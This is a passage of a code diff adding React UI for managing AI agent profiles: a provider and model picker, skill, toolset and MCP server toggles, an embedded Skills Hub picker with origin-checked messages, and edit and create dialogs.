+            children: 'Duplicate'
+          }),
+          jsx(ContextMenuSeparator, {}),
+          jsx(ContextMenuItem, {
+            onSelect: () => {
+              $selectedBot.set(bot.name)
+
+              if (typeof host.newChat === 'function') {
+                host.newChat(bot.name)
+              }
+            },
+            children: 'New chat with this agent'
+          }),
+          bot.is_default ? null : jsx(ContextMenuSeparator, {}),
+          bot.is_default
+            ? null
+            : jsx(ContextMenuItem, {
+                onSelect: () => onDelete(bot),
+                variant: 'destructive',
+                children: 'Delete'
+              })
+        ]
+      })
+    ]
+  })
+}
+
+// ── model picker (provider/model dropdowns via model.options) ───────────────
+
+function useModelOptions() {
+  return useQuery({
+    queryKey: [ID, 'model-options'],
+    queryFn: () => host.request('model.options', { include_unconfigured: true, explicit_only: false, refresh: true }),
+    staleTime: 120000,
+    retry: false
+  })
+}
+
+/**
+ * Provider + model dropdowns from the gateway's configured inventory — the
+ * same data the core model picker shows. `value = {provider, model}`;
+ * onChange receives the merged patch.
+ */
+function ModelPicker({ value, onChange, placeholderModel = 'gateway default' }) {
+  const { data, isLoading, error } = useModelOptions()
+
+  // Hooks are ALWAYS declared up front, before any conditional return.
+  // Declaring them after a return trips React error #310.
+  const NONE = '__default__'
+  const CUSTOM = '__custom__'
+  const providers = (data?.providers || []).filter(p => p && p.slug)
+  const isKnown =
+    !value.provider || value.provider === NONE || providers.some(p => p.slug === value.provider)
+  const [useFreeText, setUseFreeText] = useState(!isKnown)
+
+  if (isLoading) {
+    return jsx('div', {
+      className: 'flex justify-center py-2',
+      children: jsx(GlyphSpinner, { spinner: 'breathe', className: 'text-(--ui-text-tertiary)' })
+    })
+  }
+
+  if (error || !providers.length) {
+    // Fallback: free text (older gateway or empty inventory).
+    return jsxs('div', {
+      style: { display: 'grid', gridTemplateColumns: '1fr 1fr', gap: '10px' },
+      children: [
+        labeled(
+          'Provider',
+          jsx(Input, {
+            placeholder: 'omnirouter / 9router / nous \u2026',
+            value: value.provider,
+            onChange: event => onChange({ provider: event.target.value })
+          })
+        ),
+        labeled(
+          'Model',
+          jsx(Input, {
+            placeholder: 'antigravity/gemini-3.6-flash-high',
+            value: value.model,
+            onChange: event => onChange({ model: event.target.value })
+          })
+        )
+      ]
+    })
+  }
+
+  if (useFreeText) {
+    return jsxs('div', {
+      style: { display: 'flex', flexDirection: 'column', gap: '8px' },
+      children: [
+        jsxs('div', {
+          style: { display: 'grid', gridTemplateColumns: '1fr 1fr', gap: '10px' },
+          children: [
+            labeled(
+              'Provider (Custom)',
+              jsx(Input, {
+                placeholder: 'e.g. omnirouter, inferx, 9router',
+                value: value.provider,
+                onChange: event => onChange({ provider: event.target.value })
+              })
+            ),
+            labeled(
+              'Model (Custom)',
+              jsx(Input, {
+                placeholder: 'e.g. antigravity/gemini-3.6-flash-high',
+                value: value.model,
+                onChange: event => onChange({ model: event.target.value })
+              })
+            )
+          ]
+        }),
+        jsx(Button, {
+          variant: 'ghost',
+          size: 'sm',
+          className: 'h-6 self-start text-xs text-(--ui-text-tertiary)',
+          onClick: () => setUseFreeText(false),
+          children: '← Back to dropdowns'
+        })
+      ]
+    })
+  }
+
+  const activeProvider = providers.find(p => p.slug === value.provider) || null
+  const models = activeProvider
+    ? (activeProvider.models || []).map(m => (typeof m === 'string' ? m : m.id || m.name || ''))
+    : []
+
+  return jsxs('div', {
+    style: { display: 'grid', gridTemplateColumns: '1fr 1.4fr', gap: '10px' },
+    children: [
+      labeled(
+        'Provider',
+        jsxs(Select, {
+          value: value.provider || NONE,
+          onValueChange: v => {
+            if (v === NONE) {
+              onChange({ provider: '', model: '' })
+            } else if (v === CUSTOM) {
+              setUseFreeText(true)
+            } else {
+              const prov = providers.find(p => p.slug === v)
+              const provModels = (prov?.models || []).map(m =>
+                typeof m === 'string' ? m : m.id || m.name || ''
+              )
+              const first = provModels[0] || ''
+              onChange({
+                provider: v,
+                model: prov && provModels.includes(value.model) ? value.model : first
+              })
+            }
+          },
+          children: [
+            jsx(SelectTrigger, { className: 'h-8 rounded-md', children: jsx(SelectValue, {}) }),
+            jsxs(SelectContent, {
+              children: [
+                jsx(SelectItem, { value: NONE, children: 'Inherit (launch profile)' }),
+                ...providers.map(p =>
+                  jsx(
+                    SelectItem,
+                    { value: p.slug, children: p.name ? `${p.name} (${p.slug})` : p.slug },
+                    p.slug
+                  )
+                ),
+                jsx(SelectItem, { value: CUSTOM, children: '✏️ Enter manually…' })
+              ]
+            })
+          ]
+        })
+      ),
+      labeled(
+        'Model',
+        activeProvider && models.length > 0
+          ? jsxs(Select, {
+              value: value.model || (models[0] ?? ''),
+              onValueChange: v => onChange({ model: v }),
+              children: [
+                jsx(SelectTrigger, { className: 'h-8 rounded-md', children: jsx(SelectValue, {}) }),
+                jsx(SelectContent, {
+                  children: models.map(m => jsx(SelectItem, { value: m, children: m }, m))
+                })
+              ]
+            })
+          : jsx(Input, {
+              placeholder: placeholderModel || 'e.g. model name',
+              value: value.model,
+              onChange: event => onChange({ model: event.target.value })
+            })
+      )
+    ]
+  })
+}
+
+// ── advanced profile config (skills / toolsets / model / SOUL) ──────────────
+//
+// Shared by Edit Profile and New Agent (edit mode only for skills/toolsets —
+// a not-yet-created profile has nothing installed to toggle). Backed by
+// profiles.describe / profiles.configure; feature-detects older gateways.
+
+function CheckList({ items, onToggle, columns = 2 }) {
+  return jsx('div', {
+    style: {
+      display: 'grid',
+      gridTemplateColumns: `repeat(${columns}, minmax(0, 1fr))`,
+      gap: '2px 12px'
+    },
+    children: items.map(item =>
+      jsxs(
+        'label',
+        {
+          className: 'flex min-w-0 cursor-pointer items-center gap-1.5 py-0.5 text-xs text-(--ui-text-secondary)',
+          title: item.description || item.name,
+          children: [
+            jsx(Checkbox, {
+              checked: item.enabled,
+              onCheckedChange: value => onToggle(item.name, Boolean(value))
+            }),
+            jsx('span', { className: 'truncate', children: item.name }),
+            item.tool_count
+              ? jsx('span', {
+                  className: 'shrink-0 text-[0.6rem] text-(--ui-text-quaternary)',
+                  children: `${item.tool_count}`
+                })
+              : null
+          ]
+        },
+        item.name
+      )
+    )
+  })
+}
+
+function AdvancedProfileConfig({ bot, state, setState }) {
+  const [loaded, setLoaded] = useState(false)
+  const [unsupported, setUnsupported] = useState(false)
+  const [skillFilter, setSkillFilter] = useState('')
+
+  if (!loaded) {
+    setLoaded(true)
+    Promise.all([
+      host.request('profiles.describe', { name: bot }),
+      host.request('mcp.catalog', { profile: bot }).catch(() => null)
+    ])
+      .then(([res, cat]) => {
+        const configured = res.mcp_servers || []
+        const have = new Set(configured.map(m => m.name))
+        const catalog = ((cat && cat.servers) || []).filter(s => !have.has(s.name))
+        setState(prev => ({
+          ...prev,
+          provider: res.model?.provider || '',
+          model: res.model?.default || '',
+          soul: res.soul || '',
+          skills: res.skills || [],
+          toolsets: res.toolsets || [],
+          mcp: [
+            ...configured.map(m => ({ ...m, enabled: m.enabled !== false })),
+            ...catalog.map(s => ({
+              name: s.name,
+              enabled: false,
+              fromCatalog: true,
+              installed: s.installed,
+              auth: s.auth,
+              requires: s.requires || [],
+              description: s.description || ''
+            }))
+          ],
+          loaded: true
+        }))
+      })
+      .catch(() => setUnsupported(true))
+  }
+
+  if (unsupported) {
+    return jsx('div', {
+      className: 'px-2 py-3 text-center text-xs text-(--ui-text-tertiary)',
+      children: 'Full configuration needs a newer gateway (restart it after updating Hermes).'
+    })
+  }
+
+  if (!state.loaded) {
+    return jsx('div', {
+      className: 'flex justify-center py-4',
+      children: jsx(GlyphSpinner, { spinner: 'breathe', className: 'text-(--ui-text-tertiary)' })
+    })
+  }
+
+  const visibleSkills = skillFilter.trim()
+    ? state.skills.filter(s => s.name.toLowerCase().includes(skillFilter.trim().toLowerCase()))
+    : state.skills
+
+  const toggleSkill = (name, enabled) =>
+    setState(prev => ({
+      ...prev,
+      dirtySkills: true,
+      skills: prev.skills.map(s => (s.name === name ? { ...s, enabled } : s))
+    }))
+
+  const toggleToolset = (name, enabled) =>
+    setState(prev => ({
+      ...prev,
+      dirtyToolsets: true,
+      toolsets: prev.toolsets.map(t => (t.name === name ? { ...t, enabled } : t))
+    }))
+
+  const toggleMcp = (name, enabled) =>
+    setState(prev => ({
+      ...prev,
+      dirtyMcp: true,
+      mcp: (prev.mcp || []).map(m => (m.name === name ? { ...m, enabled } : m))
+    }))
+
+  const enabledSkills = state.skills.filter(s => s.enabled).length
+  const enabledToolsets = state.toolsets.filter(t => t.enabled).length
+  const mcpList = state.mcp || []
+  const enabledMcp = mcpList.filter(m => m.enabled).length
+
+  // Newer desktop builds export the WHOLE core Capabilities surface
+  // (hermes-agent#87317): Skills (installed list + one-click hub installs +
+  // full-skill detail), Tools (per-toolset config), and MCP — pinned to this
+  // bot via fixedProfile, tab state kept out of the page router via embedded.
+  // Render THAT instead of the checkbox stand-ins; writes go straight to the
+  // bot's backend, so the dirty-section staging below only carries
+  // model + SOUL on these builds. Older builds keep the full checklist UI.
+  if (SkillsView) {
+    return jsxs('div', {
+      className: 'grid gap-4',
+      children: [
+        jsx(ModelPicker, {
+          value: { provider: state.provider, model: state.model },
+          onChange: patch => setState(prev => ({ ...prev, dirtyModel: true, ...patch }))
+        }),
+        labeled(
+          'Capabilities (applies immediately — skills, tools, MCP)',
+          jsx('div', {
+            className: 'overflow-hidden rounded-md border border-(--ui-stroke-secondary)',
+            style: { height: 460, minHeight: 300, resize: 'vertical', overflow: 'auto' },
+            children: jsx(SkillsView, { embedded: true, fixedProfile: bot })
+          })
+        ),
+        labeled(
+          'SOUL.md (persona + agent-messaging protocol)',
+          jsx(Textarea, {
+            className: 'min-h-28 font-mono text-xs leading-5',
+            value: state.soul,
+            onChange: event => setState(prev => ({ ...prev, dirtySoul: true, soul: event.target.value }))
+          })
+        )
+      ]
+    })
+  }
+
+  return jsxs('div', {
+    className: 'grid gap-4',
+    children: [
+      jsx(ModelPicker, {
+        value: { provider: state.provider, model: state.model },
+        onChange: patch => setState(prev => ({ ...prev, dirtyModel: true, ...patch }))
+      }),
+      labeled(
+        `Skills (${enabledSkills}/${state.skills.length} enabled)`,
+        jsxs('div', {
+          className: 'grid gap-1.5 rounded-md border border-(--ui-stroke-secondary) p-2',
+          children: [
+            jsx(Input, {
+              className: 'h-7 text-xs',
+              placeholder: 'Filter skills…',
+              value: skillFilter,
+              onChange: event => setSkillFilter(event.target.value)
+            }),
+            jsx(ScrollArea, {
+              className: 'hermes-scroll-cap',
+              style: { maxHeight: 180 },
+              children: jsx(CheckList, { items: visibleSkills, onToggle: toggleSkill, columns: 2 })
+            }),
+            jsx(HubSkillsSection, {
+              forProfile: bot,
+              onInstalled: name =>
+                setState(prev =>
+                  prev.skills.some(s => s.name === name)
+                    ? prev
+                    : { ...prev, skills: [...prev.skills, { name, enabled: true }] }
+                )
+            })
+          ]
+        })
+      ),
+      labeled(
+        `Toolsets (${enabledToolsets}/${state.toolsets.length} enabled — unchecking all restores the default)`,
+        jsx('div', {
+          className: 'rounded-md border border-(--ui-stroke-secondary) p-2',
+          children: jsx(ScrollArea, {
+            className: 'hermes-scroll-cap',
+            style: { maxHeight: 320 },
+            children: jsx('div', {
+              className: 'grid gap-1.5',
+              children: state.toolsets.map(tset =>
+                jsxs(
+                  'div',
+                  {
+                    className: 'rounded-md border border-(--ui-stroke-secondary) p-2',
+                    children: [
+                      jsxs('label', {
+                        className: 'flex items-center gap-2 text-xs font-medium text-(--ui-text-secondary)',
+                        children: [
+                          jsx(Checkbox, {
+                            checked: !!tset.enabled,
+                            onCheckedChange: value => toggleToolset(tset.name, Boolean(value))
+                          }),
+                          jsx('span', { children: tset.name })
+                        ]
+                      }),
+                      // The REAL per-toolset config (env vars / API keys / model
+                      // picker / post-setup), scoped to THIS bot's profile, when
+                      // the desktop build exposes it. Older builds: just the toggle.
+                      ToolsetConfigPanel
+                        ? jsx('div', {
+                            className: 'mt-1.5 border-t border-(--ui-stroke-secondary) pt-1.5',
+                            children: jsx(ToolsetConfigPanel, { toolset: tset.name, profile: bot })
+                          })
+                        : null
+                    ]
+                  },
+                  tset.name
+                )
+              )
+            })
+          })
+        })
+      ),
+      labeled(
+        'MCP servers',
+        jsx('div', {
+          className: 'overflow-hidden rounded-md border border-(--ui-stroke-secondary)',
+          // The REAL MCP tab core Settings renders — per-server enable + OAuth
+          // sign-in + API-key setup + live probes — scoped to this bot's profile.
+          // Feature-detected: older desktop builds without the SDK export fall
+          // back to the plugin's own checkbox list + inline setup buttons.
+          children: McpTab && typeof host.getGateway === 'function'
+            ? jsx('div', {
+                style: { minHeight: 220, maxHeight: 360 },
+                children: jsx(McpTab, { gateway: host.getGateway(), profile: bot })
+              })
+            : mcpList.length === 0
+              ? jsx('div', {
+                  className: 'px-1 py-2 text-center text-xs text-(--ui-text-tertiary)',
+                  children: 'No MCP servers configured or in the catalog.'
+                })
+              : jsx(ScrollArea, {
+                  className: 'hermes-scroll-cap',
+                  style: { maxHeight: 180 },
+                  children: jsx('div', {
+                    className: 'grid gap-1 p-2',
+                    children: mcpList.map(m => {
+                      const needsSetup = m.fromCatalog && !m.installed && ((m.requires || []).length > 0 || (m.auth || '').toLowerCase() === 'oauth')
+                      return jsxs(
+                        'label',
+                        {
+                          className: 'flex items-start gap-2 text-xs text-(--ui-text-secondary)',
+                          children: [
+                            jsx(Checkbox, {
+                              checked: !!m.enabled,
+                              disabled: needsSetup,
+                              onCheckedChange: value => toggleMcp(m.name, Boolean(value))
+                            }),
+                            jsxs('span', {
+                              className: 'min-w-0',
+                              children: [
+                                jsx('span', { children: m.name }),
+                                m.fromCatalog && !needsSetup
+                                  ? jsx('span', {
+                                      className: 'ml-1.5 text-[0.65rem] text-(--ui-text-quaternary)',
+                                      children: m.installed ? 'catalog · installed' : 'catalog'
+                                    })
+                                  : null,
+                                needsSetup
+                                  ? jsx(McpSetupButton, {
+                                      profile: bot,
+                                      entry: m,
+                                      onDone: () => toggleMcp(m.name, true)
+                                    })
+                                  : null,
+                                m.description
+                                  ? jsx('div', {
+                                      className: 'truncate text-[0.65rem] leading-4 text-(--ui-text-quaternary)',
+                                      children: m.description
+                                    })
+                                  : null
+                              ]
+                            })
+                          ]
+                        },
+                        m.name
+                      )
+                    })
+                  })
+                })
+        })
+      ),
+      labeled(
+        'SOUL.md (persona + agent-messaging protocol)',
+        jsx(Textarea, {
+          className: 'min-h-28 font-mono text-xs leading-5',
+          value: state.soul,
+          onChange: event => setState(prev => ({ ...prev, dirtySoul: true, soul: event.target.value }))
+        })
+      )
+    ]
+  })
+}
+
+// ── skills hub section: the REAL hub page (docs) embedded as a picker ──────
+// https://hermes-agent.nousresearch.com/docs/skills?embed=picker hides the
+// docs chrome and adds "+ Add to this Agent" per card, posting
+// {type: 'hermes-skill-pick', ...} to us (hermes-agent#86243). We validate
+// the origin, install via skills.manage, and bubble onInstalled so the
+// checklist above gains the row. Search-box fallback kept for offline use.
+
+const HUB_ORIGIN = 'https://hermes-agent.nousresearch.com'
+const HUB_PICKER_URL = HUB_ORIGIN + '/docs/skills?embed=picker'
+
+function HubSkillsSection({ forProfile, onInstalled }) {
+  const [query, setQuery] = useState('')
+  const [results, setResults] = useState(null)
+  const [searching, setSearching] = useState(false)
+  const [installing, setInstalling] = useState(null)
+  const [installed, setInstalled] = useState({})
+  const [browseHub, setBrowseHub] = useState(false)
+  const installRef = useRef(null)
+  const frameRef = useRef(null)
+
+  // Picker messages from the embedded hub page. Origin- AND source-checked —
+  // only OUR frame may ask for an install (the hub origin alone would let any
+  // other window on it, e.g. an OAuth popup, trigger installs too); installs
+  // route through the same install() the search fallback uses.
+  useEffect(() => {
+    if (!browseHub) {
+      return undefined
+    }
+
+    const onMessage = event => {
+      if (event.origin !== HUB_ORIGIN) {
+        return
+      }
+
+      if (!frameRef.current || event.source !== frameRef.current.contentWindow) {
+        return
+      }
+
+      const data = event.data
+
+      if (!data || data.type !== 'hermes-skill-pick' || !data.name) {
+        return
+      }
+
+      const target = String(data.identifier || data.name)
+
+      // Skill identifiers are slugs / owner-name paths — keep anything
+      // else out of skills.manage.
+      if (!/^[A-Za-z0-9][A-Za-z0-9._/-]*$/.test(target)) {
+        return
+      }
+
+      if (installRef.current) {
+        void installRef.current(target, String(data.name))
+      }
+    }
+
+    window.addEventListener('message', onMessage)
+
+    return () => window.removeEventListener('message', onMessage)
+  }, [browseHub])
+
+  const search = async () => {
+    const q = query.trim()
+
+    if (!q || searching) {
+      return
+    }
+
+    setSearching(true)
+    setResults(null)
+
+    try {
+      const res = await host.request('skills.manage', { action: 'search', query: q })
+      setResults(res.results || [])
+    } catch {
+      setResults([])
+    } finally {
+      setSearching(false)
+    }
+  }
+
+  const install = async (name, displayName) => {
+    const label = displayName || name
+
+    if (installing) {
+      return
+    }
+
+    setInstalling(label)
+
+    try {
+      // With forProfile the install lands in that bot's skills dir
+      // (gateway skills.manage profile scoping); null = launch profile,
+      // which is right at create time — the new bot clones/copies from it.
+      await host.request('skills.manage', {
+        action: 'install',
+        query: name,
+        ...(forProfile ? { profile: forProfile } : {})
+      })
+      setInstalled(prev => ({ ...prev, [label]: true }))
+      host.notify({ kind: 'success', message: `Skill "${label}" installed` })
+
+      if (typeof onInstalled === 'function') {
+        onInstalled(label)
+      }
+    } catch (err) {
+      host.notifyError(err, `Installing "${label}" failed`)
+    } finally {
+      setInstalling(null)
+    }
+  }
+
+  installRef.current = install
+
+  return jsxs('div', {
+    className: 'grid gap-1.5 border-t border-(--ui-stroke-secondary) pt-2',
+    children: [
+      jsxs('div', {
+        className: 'flex items-baseline justify-between gap-2',
+        children: [
+          jsx('div', {
+            className: 'text-[0.7rem] font-medium text-(--ui-text-secondary)',
+            children: 'Skills Hub'
+          }),
+          jsx('button', {
+            type: 'button',
+            className: 'text-[0.65rem] text-(--ui-text-quaternary) hover:text-(--ui-text-secondary)',
+            onClick: () => setBrowseHub(v => !v),
+            children: browseHub ? 'hide the hub browser' : 'browse the full hub ▾'
+          })
+        ]
+      }),
+      browseHub
+        ? jsxs('div', {
+            className: 'grid gap-1',
+            children: [
+              // Resizable viewport: native CSS resize handle (bottom-right
+              // corner) lets the user drag it larger/smaller. The iframe
+              // inside is rendered oversized and scaled DOWN (133% × 0.75)
+              // so the hub page starts zoomed out — we can't style the
+              // cross-origin page itself, but scaling the frame is ours.
+              jsx('div', {
+                style: {
+                  width: '100%',
+                  height: 560,
+                  minHeight: 240,
+                  minWidth: 320,
+                  maxWidth: '100%',
+                  resize: 'both',
+                  overflow: 'hidden',
+                  border: '1px solid var(--ui-stroke-secondary)',
+                  borderRadius: 8,
+                  position: 'relative'
+                },
+                children: jsx('iframe', {
+                  src: HUB_PICKER_URL,
+                  title: 'Hermes Skills Hub',
+                  ref: frameRef,
+                  style: {
+                    width: '133.34%',
+                    height: '133.34%',
+                    border: 'none',
+                    background: 'transparent',
+                    transform: 'scale(0.75)',
+                    transformOrigin: 'top left'
+                  },
+                  sandbox: 'allow-scripts allow-same-origin'
+                })
+              }),
+              jsx('div', {
+                className: 'px-1 text-[0.65rem] leading-4 text-(--ui-text-quaternary)',
+                children:
+                  installing
+                    ? `Installing "${installing}"…`
+                    : 'Hit "+ Add to this Agent" on any skill — it installs and appears in the list above. Drag the corner to resize.'
+              })
+            ]
+          })
+        : null,
+      jsxs('div', {
+        className: 'flex gap-1.5',
+        children: [
+          jsx(Input, {
+            className: 'h-7 flex-1 text-xs',
+            placeholder: 'Search the hub (community + well-known sources)…',
+            value: query,
+            onChange: event => setQuery(event.target.value),
+            onKeyDown: event => {
+              if (event.key === 'Enter') {
+                event.preventDefault()
+                void search()
+              }
+            }
+          }),
+          jsx(Button, {
+            size: 'sm',
+            variant: 'secondary',
+            disabled: searching || !query.trim(),
+            onClick: () => void search(),
+            children: searching ? 'Searching…' : 'Search'
+          })
+        ]
+      }),
+      searching
+        ? jsx('div', {
+            className: 'px-1 text-[0.65rem] text-(--ui-text-quaternary)',
+            children: 'Searching community + well-known sources — can take ~10s…'
+          })
+        : null,
+      results === null
+        ? null
+        : results.length === 0
+          ? jsx('div', {
+              className: 'px-1 py-1.5 text-[0.7rem] text-(--ui-text-quaternary)',
+              children: 'No hub skills matched.'
+            })
+          : jsx(ScrollArea, {
+              className: 'hermes-scroll-cap',
+              style: { maxHeight: 150 },
+              children: jsx('div', {
+                className: 'grid gap-1',
+                children: results.map(r =>
+                  jsxs(
+                    'div',
+                    {
+                      className: 'flex items-center gap-2 text-xs',
+                      children: [
+                        jsxs('div', {
+                          className: 'min-w-0 flex-1',
+                          children: [
+                            jsx('div', { className: 'truncate font-medium', children: r.name }),
+                            r.description
+                              ? jsx('div', {
+                                  className: 'truncate text-[0.65rem] text-(--ui-text-quaternary)',
+                                  children: r.description
+                                })
+                              : null
+                          ]
+                        }),
+                        installed[r.name]
+                          ? jsx('span', {
+                              className: 'shrink-0 text-[0.65rem] text-(--ui-text-tertiary)',
+                              children: '✓ added'
+                            })
+                          : jsx(Button, {
+                              size: 'sm',
+                              variant: 'ghost',
+                              className: 'shrink-0 px-2 font-semibold',
+                              disabled: installing !== null,
+                              title: `Install "${r.name}" and add it to the list above`,
+                              onClick: () => void install(r.name),
+                              children: installing === r.name ? '…' : '+'
+                            })
+                      ]
+                    },
+                    r.name
+                  )
+                )
+              })
+            })
+    ]
+  })
+}
+
+function emptyAdvancedState() {
+  return {
+    loaded: false,
+    provider: '',
+    model: '',
+    soul: '',
+    skills: [],
+    toolsets: [],
+    mcp: [],
+    dirtyModel: false,
+    dirtySoul: false,
+    dirtySkills: false,
+    dirtyToolsets: false,
+    dirtyMcp: false
+  }
+}
+
+/** Persist only the dirty sections of the advanced editor. */
+async function applyAdvancedConfig(bot, state) {
+  const payload = { name: bot }
+  const applied = {}
+
+  if (state.dirtySoul) {
+    payload.soul = ensureMessagingProtocol(state.soul, bot, $lastRoster.get())
+  }
+
+  if (state.dirtyModel) {
+    const model = state.model.trim()
+    const provider = state.provider.trim()
+
+    if (model && provider) {
+      payload.model = model
+      payload.provider = provider
+    } else if (!model && !provider) {
+      try {
+        const result = await host.request('cli.exec', {
+          argv: ['--profile', bot, 'config', 'unset', 'model']
+        })
+        applied.model = result?.blocked !== true && result?.code === 0
+      } catch {
+        applied.model = false
+      }
+    } else {
+      applied.model = false
+    }
+  }
+
+  if (state.dirtySkills) {
+    payload.disabled_skills = state.skills.filter(s => !s.enabled).map(s => s.name)
+  }
+
+  if (state.dirtyToolsets) {
+    const all = state.toolsets.length
+    const enabled = state.toolsets.filter(t => t.enabled)
+    // All enabled (or none) = clear the pin; otherwise pin the checked set.
+    payload.enabled_toolsets = enabled.length === all || enabled.length === 0 ? [] : enabled.map(t => t.name)
+  }
+
+  if (state.dirtyMcp) {
+    payload.enabled_mcp_servers = (state.mcp || []).filter(m => m.enabled).map(m => m.name)
+  }
+
+  if (Object.keys(payload).length === 1) {
+    return { ok: Object.values(applied).every(Boolean), applied }
+  }
+
+  const result = await host.request('profiles.configure', payload)
+  const merged = { ...applied, ...(result?.applied || {}) }
+
+  return { ...result, ok: Object.values(merged).every(Boolean), applied: merged }
+}
+
+// ── edit profile dialog ──────────────────────────────────────────────────────
+
+function labeled(label, control) {
+  return jsxs('div', {
+    className: 'grid gap-1.5',
+    children: [
+      jsx('label', {
+        className: 'text-xs font-medium text-(--ui-text-secondary)',
+        children: label
+      }),
+      control
+    ]
+  })
+}
+
+function EditProfileDialog({ bot, open, onClose }) {
+  const metaAll = useValue($botMeta)
+  const meta = bot ? metaAll[bot.name] : null
+  const appearance = bot ? botAppearance(bot.name, meta) : { shape: 'circle', color: AVATAR_COLORS[3] }
+  const [shape, setShape] = useState(appearance.shape)
+  const [color, setColor] = useState(appearance.color)
+  const [image, setImage] = useState(appearance.image)
+  const [title, setTitle] = useState(meta?.title || '')
+  const [description, setDescription] = useState(bot?.description || '')
+  const [busy, setBusy] = useState(false)
+  const [advanced, setAdvanced] = useState(false)
+  const [adv, setAdv] = useState(emptyAdvancedState())
+
+  // Re-seed local state each time a different bot opens the dialog.
+  const [seedKey, setSeedKey] = useState(null)
+  const currentKey = bot ? `${bot.name}:${open}` : null
+  if (currentKey !== seedKey) {
+    setSeedKey(currentKey)
+    if (bot && open) {
+      setShape(appearance.shape)
+      setColor(appearance.color)
+      setImage(appearance.image)
+      setTitle(meta?.title || '')
+      setDescription(bot.description || '')
+      setBusy(false)
+      setAdvanced(false)
+      setAdv(emptyAdvancedState())
+    }
+  }
+
+  if (!bot) {
+    return null
+  }
+
+  const submit = async () => {
+    if (busy) {
+      return
+    }
+
+    setBusy(true)
+    let advancedFailed = false
+    const persistence = await saveBotMeta(bot.name, {
+      shape,
+      color,
+      image,
+      imageKind: image ? 'photo' : 'shape',
+      title: title.trim(),
+      custom: true
+    })
+    // Only an explicit remote failure is an error — 'unsupported' is the
+    // documented older-gateway fallback (local wins, silently), and toasting
+    // it would flag every save on every legacy setup forever.
+    const lookFailed = persistence.serverOutcome === 'failed'
+
+    if (lookFailed) {
+      host.notify({ kind: 'error', message: 'Saved look locally; remote persistence failed' })
+    }
+    if (persistence.serverOutcome === 'persisted') {
+      queryClient.invalidateQueries({ queryKey: ROSTER_KEY })
+    }
+
+    const desc = description.trim()
+    if (desc !== (bot.description || '').trim()) {
+      try {
+        await host.request('cli.exec', {
+          argv: ['profile', 'describe', bot.name, '--text', desc]
+        })
+        queryClient.invalidateQueries({ queryKey: ROSTER_KEY })
+      } catch (err) {
+        host.notifyError(err, 'Saved look locally; description update failed')
+      }
+    }
+
+    if (adv.loaded && (adv.dirtyModel || adv.dirtySoul || adv.dirtySkills || adv.dirtyToolsets || adv.dirtyMcp)) {
+      try {
+        const res = await applyAdvancedConfig(bot.name, adv)
+        const failed = Object.entries(res?.applied || {}).filter(([, ok]) => !ok)
+
+        if (failed.length) {
+          advancedFailed = true
+          host.notify({ kind: 'error', message: `Some sections failed: ${failed.map(([k]) => k).join(', ')}` })
+        }
+      } catch (err) {
+        advancedFailed = true
+        host.notifyError(err, 'Advanced configuration failed')
+      }
+    }
+
+    if (!advancedFailed && !lookFailed) {
+      host.notify({ kind: 'success', message: `${displayName(bot, { title })} updated` })
+    }
+    setBusy(false)
+    onClose()
+  }
+
+  return jsx(Dialog, {
+    open,
+    onOpenChange: value => !value && !busy && onClose(),
+    children: jsxs(DialogContent, {
+      className: advanced ? 'max-w-3xl' : 'max-w-sm',
+      // Same resizable-window treatment as the create dialog.
+      style: advanced
+        ? { resize: 'both', overflow: 'auto', minWidth: 420, minHeight: 360, maxWidth: '95vw', maxHeight: '90vh' }
+        : undefined,
+      children: [
+        jsxs(DialogHeader, {
+          children: [
+            jsx(DialogTitle, { children: 'Edit Profile' }),
+            jsx(DialogDescription, { children: `Appearance and role for ${displayName(bot, null)} (${bot.name}).` })
+          ]
+        }),
+        jsxs('div', {
+          className: 'grid gap-4',
+          children: [
+            jsx('div', {
+              className: 'flex justify-center py-1',
+              children: jsx(BotFace, { shape, color, image, size: 64, name: bot.name })
+            }),
+            jsx(AvatarPicker, {
+              shape,
+              color,
+              image,
+              onShape: setShape,
+              onColor: setColor,
+              onImage: setImage,
+              generateSeed: { name: bot.name, title, description }
+            }),
+            labeled(
+              'Title',
+              jsx(Input, {
+                placeholder: displayName(bot, null),
+                value: title,
+                onChange: event => setTitle(event.target.value)
+              })
+            ),
+            labeled(
+              'Description',
+              jsx(Textarea, {
+                className: 'min-h-16',
+                placeholder: 'What should this agent help with?',
+                value: description,
+                onChange: event => setDescription(event.target.value)
+              })
+            ),
+            jsxs('button', {
+              type: 'button',
+              className:
+                'flex items-center gap-1 text-xs font-medium text-(--ui-text-tertiary) hover:text-(--ui-text-secondary)',
+              onClick: () => setAdvanced(v => !v),
+              children: [
+                jsx(Codicon, { name: advanced ? 'chevron-down' : 'chevron-right', className: 'text-[0.8rem]' }),
+                'Advanced — model, skills, toolsets, SOUL.md'
+              ]
+            }),
+            advanced
+              ? jsx('div', {
+                  className: 'rounded-md border border-(--ui-stroke-secondary) p-3',
+                  children: jsx(AdvancedProfileConfig, { bot: bot.name, state: adv, setState: setAdv })
+                })
+              : null
+          ]
+        }),
+        jsxs(DialogFooter, {
+          children: [
+            jsx(Button, { variant: 'ghost', disabled: busy, onClick: onClose, children: 'Cancel' }),
+            jsx(Button, { disabled: busy, onClick: submit, children: busy ? 'Saving…' : 'Save' })
+          ]
+        })
+      ]
+    })
+  })
+}
+
+// ── create dialog ────────────────────────────────────────────────────────────
+
+function CreateAgentDialog({ open, onClose, roster }) {
+  const [name, setName] = useState('')
+  // Create mode: the profile is created LAZILY. Capability toggles are staged in
+  // component state; the profile is materialized either on Create (submit) or on
+  // the first MCP credential setup (ensureAgentCreated), whichever comes first —
+  // so OAuth / API-key setup works DURING creation, not only after in Edit.
+  const createdRef = useRef(null)
+  // In-flight profiles.create shared across concurrent triggers (Create
+  // button + MCP setup buttons). Distinct from createdRef on purpose:
+  // createdRef must stay a slug string for its sibling consumers.
+  const flightRef = useRef(null)
+  const [title, setTitle] = useState('')
+  const [description, setDescription] = useState('')
+  const [shape, setShape] = useState('circle')
+  const [color, setColor] = useState(AVATAR_COLORS[3])
+  const [image, setImage] = useState(null)
+  const [advanced, setAdvanced] = useState(false)
+  const [cloneFrom, setCloneFrom] = useState('default')
+  const [model, setModel] = useState('')
+  const [provider, setProvider] = useState('')
+  const [soul, setSoul] = useState('')
+  const [noSkills, setNoSkills] = useState(false)
+  const [shareAuth, setShareAuth] = useState(true)
+  const [advTab, setAdvTab] = useState('general')
+  // Set once ensureAgentCreated() materializes the profile for the live
+  // Capabilities tab (SkillsView needs a real backend to point at). State —
+  // not just createdRef — because the render must flip when it lands.
+  const [createdForCaps, setCreatedForCaps] = useState(null)
+  const [caps, setCaps] = useState(null)
